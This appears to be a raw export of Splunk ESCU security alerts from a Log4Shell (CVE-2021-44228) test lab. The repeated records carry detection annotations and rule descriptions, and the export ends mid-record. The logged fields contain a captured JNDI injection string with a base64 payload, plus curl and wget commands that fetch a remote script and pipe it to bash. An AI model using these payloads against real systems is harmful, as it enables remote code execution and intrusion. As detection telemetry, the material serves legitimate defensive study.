info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643951, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", 